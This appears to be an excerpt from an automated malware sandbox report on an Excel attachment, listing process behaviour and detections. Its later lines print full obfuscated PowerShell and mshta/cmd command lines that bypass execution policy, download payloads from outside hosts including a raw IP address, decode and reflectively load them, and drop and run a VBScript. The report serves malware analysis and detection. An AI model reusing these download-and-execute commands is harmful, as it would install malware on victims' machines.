      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: Swiftcopy.xla.xlsxStream path 'Workbook' entropy: 7.99900412476 (max. 8.0)
      Source: 73B30000.0.drStream path 'Workbook' entropy: 7.99898529658 (max. 8.0)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6418Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3537Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 993Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1769Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2412Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3102Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dllJump to dropped file
      Source: C:\Windows\System32\mshta.exe TID: 3968Thread sleep time: -420000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep count: 6418 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep count: 3537 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3336Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3340Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3068Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404Thread sleep count: 2412 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404Thread sleep count: 3102 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2252Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2036, type: MEMORYSTR
      Bypasses PowerShell execution policy
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA.tmp" "c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; 